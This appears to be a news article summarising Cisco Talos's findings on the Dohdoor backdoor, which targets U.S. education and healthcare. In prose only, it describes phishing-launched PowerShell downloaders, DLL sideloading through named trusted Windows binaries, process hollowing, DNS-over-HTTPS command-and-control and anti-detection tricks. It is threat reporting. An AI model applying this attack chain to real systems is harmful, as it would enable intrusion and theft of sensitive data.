New Malware Threat: Dohdoor Targets U.S. Schools and Healthcare Sectors
In a concerning development, a newly identified backdoor known as Dohdoor is reportedly targeting educational institutions and healthcare organizations across the United States through a sophisticated, multi-stage attack chain. This campaign, identified as UAT-10027, has been particularly alarming given that these sectors typically handle highly sensitive personal and medical information but frequently find themselves constrained by limited security budgets and outdated systems.
Cisco Talos, the cybersecurity division of Cisco, has noted that UAT-10027 may have ties to North Korean cyber actors. This assertion comes from the distinct similarities in tools and techniques employed by the attackers, which align with those previously observed in operations attributed to the Lazarus Group, a well-known cybercrime organization linked to North Korea. These overlaps include the use of custom decryption logic, DLL sideloading, process hollowing, and abuse of DNS-over-HTTPS (DoH) for command-and-control (C2) communications.
Overview of the Attack Chain
The ultimate objective of the attackers appears to be establishing persistent backdoor access through Dohdoor and deploying follow-on payloads. These secondary payloads are likely to include Cobalt Strike beacons aimed at compromising networks more deeply and facilitating lateral movement within victim organizations.
The UAT-10027 campaign has reportedly been in motion since at least December 2025. The attackers utilize DNS-over-HTTPS and reputable cloud infrastructure to conceal their C2 traffic, which complicates efforts to detect their malicious activities. However, the profile of targeted entities does not wholly fit the typical pattern of Lazarus Group operations that generally focus on cryptocurrency theft or defense mechanisms. Despite this, the aforementioned tools and tactics indicate a strong likelihood of North Korean involvement.
Initial Access and Exploitation Techniques
Initial access to targeted systems is believed to be facilitated by social engineering tactics, primarily via phishing emails that trigger PowerShell scripts. These scripts act as downloaders, executing a series of commands to retrieve a malicious batch script from a remote server. The telemetry data and Open Source Intelligence (OSINT) indicate that the attacker employs PowerShell to invoke curl.exe, using an encoded URL directed at fetching the harmful script.
In the subsequent phase, the malware initiates a Windows batch script, which creates a hidden working directory under C:\ProgramData or C:\Users\Public. The script then downloads a malicious Dynamic Link Library (DLL) by renaming it to mimic legitimate system files like propsys.dll or batmeter.dll. Trusted Windows binaries such as Fondue.exe, mblctr.exe, or ScreenClippingHost.exe are then employed to sideload the malicious DLL. This phase concludes with the script cleaning up its activities, including wiping the Run history and deleting itself from the system.
Payload Delivery and Evasion Methods
Upon loading Dohdoor, the malware creates a backdoor and pulls in the next-stage payload, most likely a Cobalt Strike Beacon that operates within legitimate Windows processes to avoid detection. Notably, the malware employs process hollowing techniques, executing decrypted payloads through trusted binaries, further ensuring stealth.
A unique characteristic of Dohdoor is its utilization of DNS-over-HTTPS, which allows it to blend its malicious traffic with regular web activity. Unlike traditional malware that sends plaintext DNS queries, Dohdoor creates encrypted HTTPS requests directed at Cloudflare’s DoH service. It cleverly masquerades these requests with headers that resemble legitimate applications, thus further masking its activity from traditional defense mechanisms.
Additionally, the malware obfuscates its network activity using deceptive subdomains that mimic software updates or security systems. This makes it challenging for security solutions to simply block based on string patterns, thus elevating the level of difficulty in mitigating the threat.
Anti-Detection Measures and Final Payload
Dohdoor incorporates advanced techniques to evade detection, including dynamically resolving Windows API functions by hash instead of relying on static imports. It also implements syscall unhooking against ntdll.dll to bypass monitoring codes on sensitive functions. The malware’s final payload is said to be protected by a custom XOR-SUB decryption methodology, which utilizes a complicated size ratio and position-dependent logic, further obscuring its activities.
Cisco Talos has identified TLS fingerprints that exhibit similarities to those typically associated with Cobalt Strike servers, supporting the assertion that Dohdoor serves as a loader for such payloads. In response to this emerging threat, Cisco has implemented additional security features within its security stack, including ClamAV signatures and Snort rules, aimed at detecting both the loading components and the associated network activities.
Conclusion
As cyberattacks targeting educational and healthcare sectors continue to evolve in sophistication, the emergence of malware like Dohdoor exemplifies the urgent need for enhanced security protocols. With a multi-faceted approach, combining technology and human vigilance, organizations must strive to fortify their defenses against such threats. This evolving landscape underscores the critical importance of cybersecurity in protecting sensitive data and maintaining trust within these essential sectors.